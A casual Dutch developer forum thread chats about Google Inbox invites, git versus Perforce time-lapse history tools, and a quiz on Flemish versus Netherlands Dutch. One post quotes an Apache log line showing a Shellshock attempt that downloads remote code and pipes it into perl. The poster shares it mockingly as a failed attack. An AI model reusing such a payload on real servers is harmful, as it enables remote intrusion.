De Devschuur Coffee Corner - Iteratie 7 Vorige deel Overzicht Volgende deel Laatste deel

Dit topic is onderdeel van een reeks. Ga naar het meest recente topic in deze reeks.

Pagina: 1 ... 90 ... 101 Laatste
Acties:
  • 279.154 views

Acties:
  • 0 Henk 'm!

• Rutix
  • Registratie: Augustus 2009
  • Laatst online: 05-09-2024
HuHu schreef op dinsdag 04 november 2014 @ 08:22:
Inbox ziet er mooi uit, gebruik het nu zo'n twee weken. Maar voornamelijk mobiel. Op m'n pc staan Inbox en Gmail open, maar die laatste gebruik ik toch nog het meest. Ik ben ook wel benieuwd naar de bijbehorende nieuwe Calendar-app: nieuws: Google brengt nieuwe Calendar-app uit voor Android en later voor iPhone
Ik ben ook erg benieuwd naar die nieuwe Calendar-app. Jammer genoeg heb ik nog geen invite voor inbox gehad :( maar van wat ik ervan gezien heb lijkt het me handig voor mobile maar minder handig voor pc/laptop gebruik.

Nothing to see here!

Acties:
  • 0 Henk 'm!

• Robbiedobbie
  • Laatst online: 16-09 19:30
Ik heb momenteel nog 2 invites liggen. I guess dat ik er wel 1 weg kan geven? :P

Acties:
  • 0 Henk 'm!

• Rutix
  • Laatst online: 05-09-2024
Robbiedobbie schreef op dinsdag 04 november 2014 @ 08:28:
Ik heb momenteel nog 2 invites liggen. I guess dat ik er wel 1 weg kan geven? :P
>:) jumps on that comment like a hungry lion jumps on meat.

Nothing to see here!

Acties:
  • 0 Henk 'm!

• Ryur
  • Registratie: December 2007
  • Laatst online: 16:47
Robbiedobbie schreef op dinsdag 04 november 2014 @ 08:28:
Ik ben zeker net te laat O-)
Rutix schreef op dinsdag 04 november 2014 @ 08:29:
[...]

>:) jumps on that comment like a hungry lion jumps on meat.
Schitterende omschrijving! _/-\o_

[ Voor 32% gewijzigd door Ryur op 04-11-2014 08:33 ]

Acties:
  • 0 Henk 'm!

• Robbiedobbie
Indeed you are :P

Anyway, ik zelf merk ook dat ik het eigenlijk alleen op mobiel gebruik. Bovendien is het bij mij nog niet heel effectief, aangezien mijn inbox momenteel een zooi is (2849 ongelezen emails :+). Ik gebruik het momenteel vooral om mails te laten reminden, een feature die ik wel kon gebruiken :D

Acties:
  • 0 Henk 'm!

• Ryur
Robbiedobbie schreef op dinsdag 04 november 2014 @ 08:33:
Indeed you are :P

Anyway, ik zelf merk ook dat ik het eigenlijk alleen op mobiel gebruik. Bovendien is het bij mij nog niet heel effectief, aangezien mijn inbox momenteel een zooi is (2849 ongelezen emails :+). Ik gebruik het momenteel vooral om mails te laten reminden, een feature die ik wel kon gebruiken :D
Hoe vergelijkt het zich met Mailbox dan?

Dat is een app die ik wel een tijdje heb gebruikt, maar mij niet super beviel.

Pff.. net in de trein, ging de deuren niet open. Uiteindelijk een halfuur later op bestemming dan bedoeling is :( Mij maakt het niet zoveel uit, maar er zaten vrienden van mij in die een tentamen hadden!

Acties:
  • 0 Henk 'm!

• Robbiedobbie
Ik zou het eerlijk gezegd niet zo weten. Ik heb altijd gewoon de gmail app gebruikt. Toen inbox invite binnen kwam en ik ging proberen, kwam ik die feature tegen en dacht ik van "hmm, die had ik allang moeten hebben..." :+

Acties:
  • 0 Henk 'm!

• Alex)
  • Registratie: Juni 2003
  • Laatst online: 21-08 11:20
Uw persoonlijke score is 40%

Uw Standaardnederlands heeft een licht-Vlaamse toets. Nederlanders zullen nu en dan een woord van u kunnen leren.
Ha! :)

We are shaping the future

Acties:
  • 0 Henk 'm!

• Dido
  • Registratie: Maart 2002
  • Laatst online: 19:21

Dido

heforshe

7%, terwijl ik 12% van mijn leven in Vlaanderen gewoond heb. Ik heb een hoop afgeleerd :)

Wel duidelijk dat de test voor Vlamingen is bedoeld. Er zitten "Vlaamse" zinnen tussen waarvan ik vermoed dat de meeste Nederlanders in dit topic ze niet zouden redigeren in een aangeleverde tekst.

Wat betekent mijn avatar?

Acties:
  • 0 Henk 'm!

• incaz
  • Registratie: Augustus 2012
  • Laatst online: 15-11-2022
Ah, ruzie met git en geen makkelijke manier om de wijzigingen te zien. Zelfs Sourcetree werkt niet echt mee door de diffs niet te splitten.

(Ik vind trouwens dat de nieuwe mode om alles wit te maken en met zo min mogelijk lijntjes, die 'clean look', best vermoeiend kijken bij complexere schermen. Doe mij maar wat meer visuele houvast.)

Never explain with stupidity where malice is a better explanation

Acties:
  • 0 Henk 'm!

• PrisonerOfPain
  • Registratie: Januari 2003
  • Laatst online: 26-05 17:08
incaz schreef op dinsdag 04 november 2014 @ 10:31:
Ah, ruzie met git en geen makkelijke manier om de wijzigingen te zien. Zelfs Sourcetree werkt niet echt mee door de diffs niet te splitten.
Heeft git/sourcetree eigenlijk zoiets als de Time-Lapse View in Perforce?

YouTube: Using Time-lapse View

Acties:
  • 0 Henk 'm!

• Firesphere
  • Registratie: September 2010
  • Laatst online: 11:08

Firesphere

Yoshis before Hoshis

Ehhh, sowieso heeft git dat, daar is het een version-control systeem voor. De meeste IDE's kunnen dit ook voor je doen. Of SourceTree het ook heeft, weet ik niet, maar je kan wel gewoon versies met elkaar vergelijken etc.

I'm not a complete idiot. Some parts are missing.
.Gertjan.: Ik ben een zelfstandige alcoholist, dus ik bepaal zelf wel wanneer ik aan het bier ga!

Acties:
  • 0 Henk 'm!

• Dido

Dido

heforshe

of ik check ff in welk topic ik zit :(

[ Voor 84% gewijzigd door Dido op 04-11-2014 11:03 ]

Acties:
  • 0 Henk 'm!

• incaz
Ik vind niet dat version control systemen het echt makkelijk maken om te kijken wat er nu gewijzigd is - je moet elke file apart afgaan. Commandline is natuurlijk al helemaal drama, gewoon volstrekt niet overzichtelijk.

Helaas kent ook mijn ide geen makkelijk overzicht waarbij je de file alleen maar hoeft aan te klikken en je meteen de wijzigingen ziet. Ik wil gewoon basically drie kolommen: links de files die door git gemarkeerd zijn als gewijzigd, en zodra je een van die files aanklikt, in de rechter twee kolommen een visuele diff. Source tree is er bijna, maar helaas nog steeds geen split view op de diffs.

Acties:
  • 0 Henk 'm!

• wackmaniac
  • Registratie: Februari 2004
  • Laatst online: 09:15
git status en git diff

Wij hebben een lokale Gitlab draaien en die heeft een prachtige diff view. En als echte tweakers is zoiets ook nog wel zelf te knutselen, mss zitten er meer mensen op te wachten :)

[ Voor 42% gewijzigd door wackmaniac op 04-11-2014 11:07 ]

Read the code, write the code, be the code!

Acties:
  • 0 Henk 'm!

• Firesphere

Firesphere

Yoshis before Hoshis

In IntelliJ kun je gewoon zeggen Git->History. Dan krijg je een lijst met de geschiedenis van het bestand.
Kies een versie, en je krijgt de diff te zien.

.Gertjan.: Ik ben een zelfstandige alcoholist, dus ik bepaal zelf wel wanneer ik aan het bier ga!

Acties:
  • 0 Henk 'm!

• Hipska
  • Registratie: Mei 2008
  • Laatst online: 15:54
Je bedoelt iets zoals NetBeans doet? Of de diff tool bij Xcode?

Acties:
  • 0 Henk 'm!

• PrisonerOfPain
Firesphere schreef op dinsdag 04 november 2014 @ 10:42:
Ehhh, sowieso heeft git dat, daar is het een version-control systeem voor. De meeste IDE's kunnen dit ook voor je doen. Of SourceTree het ook heeft, weet ik niet, maar je kan wel gewoon versies met elkaar vergelijken etc.
Ik doel op een GUI tool die je door een file z'n geschiedenis heen laat scrollen zodat je wijzigingen over tijd kunt zien inclusief highlights voor nieuwe of oudere commits.

Ik heb t niet over een lijstje van alle changes in een bestand of over zoiets banaals als een reguliere diff

Acties:
  • 0 Henk 'm!

• Ryur
PrisonerOfPain schreef op dinsdag 04 november 2014 @ 11:17:
[...]

Ik doel op een GUI tool die je door een file z'n geschiedenis heen laat scrollen zodat je wijzigingen over tijd kunt zien inclusief highlights voor nieuwe of oudere commits.

Ik heb t niet over een lijstje van alle changes in een bestand of over zoiets banaals als een reguliere diff
Ja dat heeft Git.
Ik gebruik zelf Tower op MacOSX.

Maar de meeste (zo niet alle?) Jetbrains producten hebben het in de IDE gebouwd.

Acties:
  • 0 Henk 'm!

• Firesphere

Firesphere

Yoshis before Hoshis

PrisonerOfPain schreef op dinsdag 04 november 2014 @ 11:17:
[...]

Wat ik in je video zie, zit standaard in IntelliJ. Ok, het uiterlijk is iets anders natuurlijk, maar je kan gewoon op tags selecteren, diffs bekijken, verschillen tussen commits, etc.

Acties:
  • 0 Henk 'm!

• Korben
  • Registratie: Januari 2001
  • Laatst online: 13-07 01:53

Korben

() => {};

Firesphere schreef op dinsdag 04 november 2014 @ 11:21:
[...]

Wat ik in je video zie, zit standaard in IntelliJ. Ok, het uiterlijk is iets anders natuurlijk, maar je kan gewoon op tags selecteren, diffs bekijken, verschillen tussen commits, etc.
Het bekijken van een diff en het bekijken van verschillen tussen commits is wel ietsje anders dan wat hier getoond wordt; dit is een letterlijke time-line van wijzigingen, waarbij bijvoorbeeld de scrollpositie niet verandert als je naar een volgende revisie gaat. Dat heeft IntelliJ niet, voor zover ik kan zien.

.oisyn: Échte programmeurs haten PHP met een passie. Ben jij soms geen echte programmeur?

Acties:
  • 0 Henk 'm!

• incaz
Het mag wat eleganter maar die timelapse vind ik wel heel handig als je door oude wijzigingen moet ploeteren

Wackmaniac, Git status en git diff zijn toch nogal intensief als je een hele lijst met files af wilt lopen en snel door wilt kijken. En zelf knutselen is leuk, alleen ik heb wel iets anders te doen :)

Acties:
  • 0 Henk 'm!

• PrisonerOfPain
Ryur schreef op dinsdag 04 november 2014 @ 11:18:
[...]

Ja dat heeft Git.
Ik gebruik zelf Tower op MacOSX.

Maar de meeste (zo niet alle?) Jetbrains producten hebben het in de IDE gebouwd.
Als je de History panel in Tower bedoelt - dat is niet hetzelfde. Je moet dan nog steeds alle individuele commits af gaan om uit te vinden waar regel nr X vandaan komt.

Acties:
  • 0 Henk 'm!

• ZaZ
  • Registratie: Oktober 2002
  • Laatst online: 19-08 14:24

ZaZ

Tweakers abonnee

PrisonerOfPain schreef op dinsdag 04 november 2014 @ 11:37:
[...]

Als je de History panel in Tower bedoelt - dat is niet hetzelfde. Je moet dan nog steeds alle individuele commits af gaan om uit te vinden waar regel nr X vandaan komt.
Bedoel je niet gewoon blame?

Lekker op de bank

Acties:
  • 0 Henk 'm!

• Gleighton
  • Registratie: November 2008
  • Niet online
Dan kun je git blame doen op de file, dan kun je per regel zien waar de code vandaan komt en wie het gemold heeft. Maar die P4 timeline werkt ook nice.

Acties:
  • 0 Henk 'm!

• Korben
  • Registratie: Januari 2001
  • Laatst online: 13-07 01:53

Korben

() => {};

PrisonerOfPain schreef op dinsdag 04 november 2014 @ 11:37:
[...]

Git en Mercurial hebben wel een Blame (of Annotate)-view; dan kun je wel bekijken in welke revisie een regel voor het laatst gewijzigd is. Als je echter verder terug wilt kijken dan die meest recente revisie, zul je (in Mercurial) je repo moeten updaten naar eerdere revisie en het nogmaals doen.

.oisyn: Échte programmeurs haten PHP met een passie. Ben jij soms geen echte programmeur?

Acties:
  • 0 Henk 'm!

• wackmaniac
  • Registratie: Februari 2004
  • Laatst online: 09:15
@Incaz, je kan in gitlab volgens mij een range van commit selecteren en hier een diff van tonen. Mss dat een oplossing?

Read the code, write the code, be the code!

Acties:
  • 0 Henk 'm!

• EddoH
  • Registratie: Maart 2009
  • Niet online

EddoH

Backpfeifengesicht

PrisonerOfPain schreef op dinsdag 04 november 2014 @ 10:38:
[...]

Heeft git/sourcetree eigenlijk zoiets als de Time-Lapse View in Perforce?

YouTube: Using Time-lapse View
Ik heb die functionaliteit nog niet gevonden voor Git. Met Perforce gebruikte ik hem ook vaak.

Acties:
  • 0 Henk 'm!

• Skyaero
  • Registratie: Juli 2005
  • Niet online
quote: apache log
[Mon Nov 03 14:14:07 2014] [error] [client 37.48.73.210] File does not exist: /var/www/cgi-bin, referer: () { :; }; curl http://xxx.xxx.xxx.xxx/~prajaks/310482/index.png | perl
nice try :+

Acties:
  • 0 Henk 'm!

• .oisyn
  • Registratie: September 2000
  • Laatst online: 16:37

.oisyn

Moderator Devschuur®

Demotivational Speaker

ZaZ schreef op dinsdag 04 november 2014 @ 11:39:
[...]

Bedoel je niet gewoon blame?
Nee, want die geeft louter voor elke regel aan wat de laatste commit was. Die informatie geeft de time-lapse idd ook op een enkele revisie, maar daarnaast kun je gemakkelijk door de revisies heen scrollen.

Give a man a game and he'll have fun for a day. Teach a man to make games and he'll never have fun again.

Acties:
  • 0 Henk 'm!

• .oisyn

.oisyn

Moderator Devschuur®

Demotivational Speaker

Dido schreef op dinsdag 04 november 2014 @ 09:21:
Wel duidelijk dat de test voor Vlamingen is bedoeld. Er zitten "Vlaamse" zinnen tussen waarvan ik vermoed dat de meeste Nederlanders in dit topic ze niet zouden redigeren in een aangeleverde tekst.
Ik had dacht dat dat ook het hele idee van de test was. Ik vond het juist andersom raar: er zaten zinnen tussen waar ik niets Vlaams aan vond. Maar goed, blijkbaar ben ik 20% Vlaams als geboren en getogen Utrechter 8)7

En dan die zin over Wim Dupont. Ja, ik zou die zin niet gebruiken in een brief of toespraak, om de simpele reden dat ik niet Wim Dupont heet :+

[ Voor 12% gewijzigd door .oisyn op 04-11-2014 12:35 ]

Give a man a game and he'll have fun for a day. Teach a man to make games and he'll never have fun again.

Acties:
  • 0 Henk 'm!

• Creepy
  • Registratie: Juni 2001
  • Laatst online: 21-09 21:47

Creepy

Tactical Espionage Splatterer

In bijv Eclipse kan je "show history" doen op 1 file, zodat je een overzicht van alle revisies van die specifieke file te zien krijgt. Vervolgens kan je per rivisie een show annotations doen, of per revisie bekijken, of per revisie een diff doen t.o.v. van de huidige staat, of t.o.v. van de vorige commit. Uiteindelijk dezelfde functionaliteit, maar meer handelingen nodig. Maar met de info die in git beschikbaar is, zou dezelfde view gemaakt kunnen worden.

"I had a problem, I solved it with regular expressions. Now I have two problems". That's shows a lack of appreciation for regular expressions: "I know have _star_ problems" --Kevlin Henney

Acties:
  • 0 Henk 'm!

• .oisyn

.oisyn

Moderator Devschuur®

Demotivational Speaker

Creepy schreef op dinsdag 04 november 2014 @ 12:36:
Maar met de info die in git beschikbaar is, zou dezelfde view gemaakt kunnen worden.
Logisch. Het enige wat je nodig hebt zijn gewoon alle revisies van de file. Elk versioning systeem kan je dat vertellen :)

Acties:
  • 0 Henk 'm!

• RayNbow
  • Registratie: Maart 2003
  • Laatst online: 19:37

RayNbow

Kirika <3

.oisyn schreef op dinsdag 04 november 2014 @ 12:34:
Maar goed, blijkbaar ben ik 20% Vlaams als geboren en getogen Utrechter 8)7
Hier ook 20%, maar dan als Waddinxvener. :p

Ipsa Scientia Potestas Est
NNID: ShinNoNoir

Acties:
  • 0 Henk 'm!

• WernerL
  • Registratie: December 2006
  • Nu online
Ik ben blijkbaar ook 20% vlaams.. Opgegroeid in Noord brabant trouwens. Brabants lijkt in de verste verte niet op Vlaams overigens. :P

[ Voor 6% gewijzigd door WernerL op 04-11-2014 13:05 ]

Roses are red, violets are blue, unexpected '{' on line 32.

Acties:
  • 0 Henk 'm!

• ZpAz
  • Registratie: September 2005
  • Laatst online: 21-09 15:23
20% Als Groninger.

Tweakers Time Machine Browser Extension | Chrome : Firefox

Acties:
  • 0 Henk 'm!

• .oisyn

.oisyn

Moderator Devschuur®

Demotivational Speaker

Afbeeldingslocatie: http://img-9gag-lol.9cache.com/photo/aPyAMPw_460s.jpg

Acties:
  • 0 Henk 'm!

• Mercatres
  • Registratie: September 2009
  • Laatst online: 19-09 19:50
Gisteren 23% gehaald, ook al woon ik al/amper 16 jaar in België. Maar ik let dan ook wel op mijn schrijfstijl.

Acties:
  • 0 Henk 'm!

• Firesphere

Firesphere

Yoshis before Hoshis

Bij mij doet de hele test't gewoon niet.
In Safari lijkt er iets te werken:
51-75%Uw Standaardnederlands is vrij Vlaams. Nederlanders zullen uw woordgebruik merkwaardig óf schattig vinden.
:?

[ Voor 68% gewijzigd door Firesphere op 04-11-2014 13:37 ]

Acties:
  • 0 Henk 'm!

• OkkE
  • Registratie: Oktober 2000
  • Laatst online: 04-09 08:16

OkkE

CSS influencer :+

13% als Zeeuw. :)

“The best way to get the right answer on the Internet is not to ask a question, it's to post the wrong answer.”
QA Engineer walks into a bar. Orders a beer. Orders 0 beers. Orders 999999999 beers. Orders a lizard. Orders -1 beers.

Acties:
  • 0 Henk 'm!

• Dido

Dido

heforshe

Ik had wel even door die zinnen heen willen lopen, en ik verwachtte ze in de mail te krijgen. Maar die mail is nooit aangekomen. Sommige zaken zijn best subtiel.

Acties:
  • 0 Henk 'm!

• ElkeBxl
  • Registratie: Oktober 2014
  • Laatst online: 02-07 09:03

ElkeBxl

Tassendraagster

Dido schreef op dinsdag 04 november 2014 @ 13:37:
Ik had wel even door die zinnen heen willen lopen, en ik verwachtte ze in de mail te krijgen. Maar die mail is nooit aangekomen. Sommige zaken zijn best subtiel.
Ja een overzichtje van wat een zin nu "vlaams" maakte had ik wel willen hebben. Want ik had zelden het gevoel van "dat zou ik nu niet zeggen of anders verwoorden". Meeste zou zo uit een tekst van mij kunnen komen :)

Without nipples, boobs are pointless - 365 project - In mijn hoofd is het alle dagen Kerstmis - What type of bees make milk? Boobies! - What type of bees are scary? BoooOOOOOooobeees! - Cactusliefhebster

Acties:
  • 0 Henk 'm!

• Firesphere

Firesphere

Yoshis before Hoshis

.oisyn schreef op dinsdag 04 november 2014 @ 12:34:
[...]

Ik had dacht dat dat ook het hele idee van de test was. Ik vond het juist andersom raar: er zaten zinnen tussen waar ik niets Vlaams aan vond. Maar goed, blijkbaar ben ik 20% Vlaams als geboren en getogen Utrechter 8)7

En dan die zin over Wim Dupont. Ja, ik zou die zin niet gebruiken in een brief of toespraak, om de simpele reden dat ik niet Wim Dupont heet :+
Ow, ik zou die zin zo in een brief of toespraak gebruiken, benieuwd hoe't publiek daar op zou reageren :P

Acties:
  • 0 Henk 'm!

• Styxxy
  • Laatst online: 16:01
53% Vlaams :+ , duidelijk wat afgesleten door hier te zitten. Mijn woordgebruik zou schattig overkomen voor de NL'ers :P , haha.

Acties:
  • 0 Henk 'm!

• ElkeBxl

ElkeBxl

Tassendraagster

Ne pinguin kan dan ook azo schattig zijn! :)

Without nipples, boobs are pointless - 365 project - In mijn hoofd is het alle dagen Kerstmis - What type of bees make milk? Boobies! - What type of bees are scary? BoooOOOOOooobeees! - Cactusliefhebster

Acties:
  • 0 Henk 'm!

• Mercatres
Aaaaargh! Ze zijn hier buiten met iets aan het boren, en het is zo hard dat ik het zelfs door m'n headset heen hoor...

Acties:
  • 0 Henk 'm!

• Geerrrt
  • Registratie: Juli 2008
  • Laatst online: 15:49
Werkt F.West vort bij Google?

Afbeeldingslocatie: http://imgur.com/TAr2hoX.png

[ Voor 8% gewijzigd door Geerrrt op 04-11-2014 14:48 ]

Eury#2434

Acties:
  • 0 Henk 'm!

• BikkelZ
  • Registratie: Januari 2000
  • Laatst online: 21-02 08:50

BikkelZ

CMD+Z

Ik heb het idee dat alle zinnen Vlaams waren. Ik had nog steeds een percentage aan Vlaams terwijl ik 90% als Vlaams zag.

iOS developer

Acties:
  • 0 Henk 'm!

• Dido

Dido

heforshe

ElkeBxl schreef op dinsdag 04 november 2014 @ 14:30:
Ja een overzichtje van wat een zin nu "vlaams" maakte had ik wel willen hebben. Want ik had zelden het gevoel van "dat zou ik nu niet zeggen of anders verwoorden". Meeste zou zo uit een tekst van mij kunnen komen :)
Ik heb hem gewoon nog een keer gedaan :)

1 Toen de autostrade pas in gebruik was genomen, kon men nog af en toe een boer met zijn koeien zien oversteken.
snelweg
2 De voorstelling van mijn nieuwe verhalenbundel ‘De duif die vals zong’ gaat door in het duivenhok van mijn grootvader.
speelt zich af
3 Hij probeerde zijn hoed uit het water te vissen, maar kon er niet aan.
bij
4 Mensen uit brandende flatgebouwen in veiligheid brengen is dagdagelijkse kost voor mijn broer.
dagelijkse
5 Je moet nooit reageren op geruchten die zo’n mensen proberen te verspreiden.
zulke
6 Ze noemen mij Wim Dupont, maar ik heet eigenlijk Willem Emmanuel Gaston Thierry François Léonard Dupont.
?? (geen idee wat hier Vlaams aan is, behalve de absurde hoeveelheid voornamen)
7 De directie stelt voor dat iedereen vanaf nu zijn eigen thermoskan koffie mee naar het werk brengt.
meebrengt naar het werk (hoewel deze scheiding van het samengestelde werkwoord ook in NL acceptabel is, imho)
8 Het is nu drie maand geleden dat ik nog iets gehoord heb van mijn buurman, de verdwijnkunstenaar.
maanden
9 Het was geen slecht concert, maar wie oude hits verwachtte, bleef op zijn honger zitten.
kon lang wachten / kwam van een koude kermis thuis
10 Het is een hele afstand, maar eens dat je uit de woestijn bent, is het nog maar een dag of drie lopen.
zodra
11 Het was kwart na zes toen de koning op het balkon verscheen met een scheur in zijn broek.
over
12 Ik zou de stroomgenerator kunnen in gang zetten, maar die veroorzaakt een ondraaglijke stank in de hele straat.
in gang kunnen zetten - aan kunnen zetten
13 Mijn broertje was niet in het minst verlegen; aan elke politieagent vroeg hij of hij eens met zijn dienstwapen mocht schieten.
allerminst
14 Telkens () ik achterom keek, schoof ze haar zonnebril omhoog en knipoogde ze vettig in mijn richting.
als / [i]gaf ze een vette knippog[] ("een vette knipoog" ken ik, maar ik heb geen idee of dat bedoeld wordt)
15 Die dag kwam hij onverwacht vroeger thuis van zijn werk en toen kwam de kat op de koord.
was de boot aan (de koord was al een aanwijzing, da's het koord in NL)
16 We stonden naar de apen te kijken en merkten dat sommige een ongezonde seksuele appetijt vertoonden.
lust
17 Ze gaan nooit geloven dat je die stier hebt kunnen vangen en terugbrengen naar de weide.
zullen (hoewel gaan ook in NL geaccepteerd zal worden)
18 Krakend en piepend kwam het treintje in beweging, en dan moesten we nog de berg op.
?? geen idee wat hier Vlaams aan is. De aanwezigheid van een berg? Die hebben we niet (veel) in NL)
19 De bassist van Metallica was stoned, viel van het podium en raakte gekwetst aan zijn hand.
gewond (gekwetst duid in NL op geestelijke pijn)
20 Mijn overbuurman verkoopt Lamborghini’s aan de prijs van een Lada.
voor

Acties:
  • 0 Henk 'm!

• BikkelZ

BikkelZ

CMD+Z

Als de voorstelling afgelast was in het gemeenschapshuis* ging hij later door in het duivenhok, dus gewoon Nederlands.

*pun intended

iOS developer

Acties:
  • 0 Henk 'm!

• NeFoRcE
  • Registratie: Mei 2004
  • Laatst online: 16:19

NeFoRcE

Hallo? Bent u daar?

Zojuist weer een dopje Strohrum 80% gehad, na het opleveren van een project. Pffff :|

Professioneel Heftruck Syndroom

Acties:
  • 0 Henk 'm!

• BtM909
  • Registratie: Juni 2000
  • Niet online

BtM909

Watch out Guys...

Topicstarter
Waarom doe je dat dan ook? :P

Ace of Base vs Charli XCX - All That She Boom Claps (RMT) | Clean Bandit vs Galantis - I'd Rather Be You (RMT)
You've moved up on my notch-list. You have 1 notch
I have a black belt in Kung Flu.

Acties:
  • 0 Henk 'm!

• Dido

Dido

heforshe

Inderdaad. Als ze mij dat bocht voeren als ik iets oplever is dat niet best voor mijn motivatie :(

Acties:
  • 0 Henk 'm!

• BikkelZ

BikkelZ

CMD+Z

Één dopje maar?

HOLLANDERS!

iOS developer

Acties:
  • 0 Henk 'm!

• incaz
1 Toen de autostrade pas in gebruik was genomen, kon men nog af en toe een boer met zijn koeien zien oversteken.

Grappig, want er zitten nog een paar Vlaamse zaken in, die niet per se fout of ongewoon zijn maar die door d'n 'Ollanders toch eerder anders geschreven zouden worden: bv 'net' vs 'pas' en 'kon men af en toe nog' -> woordvolgorde.

18 Krakend en piepend kwam het treintje in beweging, en dan moesten we nog de berg op.
?? geen idee wat hier Vlaams aan is. De aanwezigheid van een berg? Die hebben we niet (veel) in NL)

dan -> toen.

Acties:
  • 0 Henk 'm!

• WernerL
  • Registratie: December 2006
  • Nu online
incaz schreef op dinsdag 04 november 2014 @ 15:06:
[...]

dan -> toen.
Op zijn NL's:

en toen moesten we de berg nog op.

De volgorde is net wat anders. 'nog de berg op' => 'de berg nog op'

[ Voor 10% gewijzigd door WernerL op 04-11-2014 15:10 ]

Roses are red, violets are blue, unexpected '{' on line 32.

Acties:
  • 0 Henk 'm!

• Dido

Dido

heforshe

incaz schreef op dinsdag 04 november 2014 @ 15:06:

Grappig, want er zitten nog een paar Vlaamse zaken in, die niet per se fout of ongewoon zijn maar die door d'n 'Ollanders toch eerder anders geschreven zouden worden: bv 'net' vs 'pas' en 'kon men af en toe nog' -> woordvolgorde.
net/pas is twijfelachtig, maar ik denk dat net inderdaad meer gebruikt zal worden.
En "kon men nog af en toe" zal inderdaad ook iets natuurlijker overkomen.

dan -> toen.
Yes! Dat ik die gemist heb!

Scherp :)

Acties:
  • 0 Henk 'm!

• ElkeBxl

ElkeBxl

Tassendraagster

Dido schreef op dinsdag 04 november 2014 @ 14:52:
[...]

Interessant om te zien :) Voor mij zijn woorden als autostrade gewoon standaard, ik zou daar nooit bij stilstaan dat het vlaamse woorden zijn. Sommige verschillen zijn wel subtiel, interessant. Sommige zaken vind ik wel fascinerend zoals dat jullie een verschil maken tussen "gekwetst" en "gewond".

Acties:
  • 0 Henk 'm!

• Firesphere

Firesphere

Yoshis before Hoshis

Ik zie een hoop opmerkingen staan, die ik joust vreemder vind dan de "Vlaamse" variant.

Acties:
  • 0 Henk 'm!

• Dido

Dido

heforshe

ElkeBxl schreef op dinsdag 04 november 2014 @ 15:11:
Interessant om te zien :) Voor mij zijn woorden als autostrade gewoon standaard, ik zou daar nooit bij stilstaan dat het vlaamse woorden zijn. Sommige verschillen zijn wel subtiel, interessant. Sommige zaken vind ik wel fascinerend zoals dat jullie een verschil maken tussen "gekwetst" en "gewond".
Het stomme is dat het best even duurde voordat ik me realiseerde waarom gekwetst vreemd overkwam.

Als er gewoon had gestaan "na de val van het podium was hij gekwetst", had een Nederlander onbewust aangenomen dat zijn ego geschaad was.
Firesphere schreef op dinsdag 04 november 2014 @ 15:12:
Ik zie een hoop opmerkingen staan, die ik joust vreemder vind dan de "Vlaamse" variant.
Als de Vlaamse variant je minder "vreemd" voorkomt is dat misschien helemaal niet zo gek. "Vreemd" is ook maar een kwestie van gewenning. Ik kan de meeste Vlaamse varianten prima plaatsen (heb er gewoond, dat helpt), maar zie ze wel als anders dan wat ik als (kleiner) kind geleerd heb (tot mijn 9e in het Gooi gewoond - ik durf te stellen dat ik een redelijk "standaard Nederlands" taalgebruik kan claimen).

[ Voor 31% gewijzigd door Dido op 04-11-2014 15:16 ]

Acties:
  • 0 Henk 'm!

• incaz
WernerL schreef op dinsdag 04 november 2014 @ 15:08:
De volgorde is net wat anders. 'nog de berg op' => 'de berg nog op'
Oh ja, dat ook inderdaad!

Interessant, die subtiliteiten :)

Acties:
  • 0 Henk 'm!

• kenneth
  • Registratie: September 2001
  • Niet online

kenneth

achter de duinen

5 Je moet nooit reageren op geruchten die zo’n mensen proberen te verspreiden.
zulke
Argh, die! Veel woorden en uitdrukkingen zijn nu eenmaal zoals ze zijn, maar zo een mensen? 7(8)7 Dat is gewoon helemaal geen Nederlands.

Look, runners deal in discomfort. After you get past a certain point, that’s all there really is. There is no finesse here.

Acties:
  • 0 Henk 'm!

• ElkeBxl

ElkeBxl

Tassendraagster

Je bent niet alleen Firesphere :) Ik vind veel van de vlaamse varianten gewoon logischer maar ik ben dan ook een vlaamse :p
Dido schreef op dinsdag 04 november 2014 @ 15:13:
[...]

Het stomme is dat het best even duurde voordat ik me realiseerde waarom gekwetst vreemd overkwam.

Als er gewoon had gestaan "na de val van het podium was hij gekwetst", had een Nederlander onbewust aangenomen dat zijn ego geschaad was.
Ja het maakt het best subtiel :) Ik merk in ieder geval niet veel van die verschillen als ik bv. teksten op .nl sites lees tegenover teksten op .be sites.
kenneth schreef op dinsdag 04 november 2014 @ 15:16:
[...]
Argh, die! Veel woorden en uitdrukkingen zijn nu eenmaal zoals ze zijn, maar zo een mensen? 7(8)7 Dat is gewoon helemaal geen Nederlands.
Natuurlijk niet, dat is vlaams >:) I love it! :9

Acties:
  • 0 Henk 'm!

• kenneth
  • Registratie: September 2001
  • Niet online

kenneth

achter de duinen

ElkeBxl schreef op dinsdag 04 november 2014 @ 15:17:
Natuurlijk niet, dat is vlaams >:) I love it! :9
Zeggen jullie dan ook: er staan een glazen op het aanrecht?

Ga dan helemaal over op het Frans, dan kan je des gebruiken voor onbepaald meervoud :P

Look, runners deal in discomfort. After you get past a certain point, that’s all there really is. There is no finesse here.

Acties:
  • 0 Henk 'm!

• Firesphere

Firesphere

Yoshis before Hoshis

ElkeBxl schreef op dinsdag 04 november 2014 @ 15:17:
Je bent niet alleen Firesphere :) Ik vind veel van de vlaamse varianten gewoon logischer maar ik ben dan ook een vlaamse :p
Ja, kijk, da's nogal een verschil. Ik ben namelijk geen Vlaamse.

Acties:
  • 0 Henk 'm!

• Dido

Dido

heforshe

Firesphere schreef op dinsdag 04 november 2014 @ 15:22:
Steeltje?

Acties:
  • 0 Henk 'm!

• ElkeBxl

ElkeBxl

Tassendraagster

kenneth schreef op dinsdag 04 november 2014 @ 15:20:
[...]

Zeggen jullie dan ook: er staan een glazen op het aanrecht?

Ga dan helemaal over op het Frans, dan kan je des gebruiken voor onbepaald meervoud :P
"er staan glazen op het aanrecht", zo zeggen wij dat (als we al "aanrecht" gebruiken... dat heb ik al jaren niet meer gehoord).

Gelukkig zijn er nog vlamingen die trots zijn op hun vlaams, als het van de fransozen af zou hangen zou het wel andere koek zijn... Brussel is helaas al verloren. Zogezegd een tweetalige stad maar toen ik mijn adres wou wijzigen konden ze mij op de stadsdiensten niet helpen in het nederlands. Heureusement, j'avais bien expliqué :*)
Firesphere schreef op dinsdag 04 november 2014 @ 15:22:
[...]

One of us! One of us! One of us!

Acties:
  • 0 Henk 'm!

• .oisyn

.oisyn

Moderator Devschuur®

Demotivational Speaker

[...]

Dit verklaart wel wat ;)
2 De voorstelling van mijn nieuwe verhalenbundel ‘De duif die vals zong’ gaat door in het duivenhok van mijn grootvader.
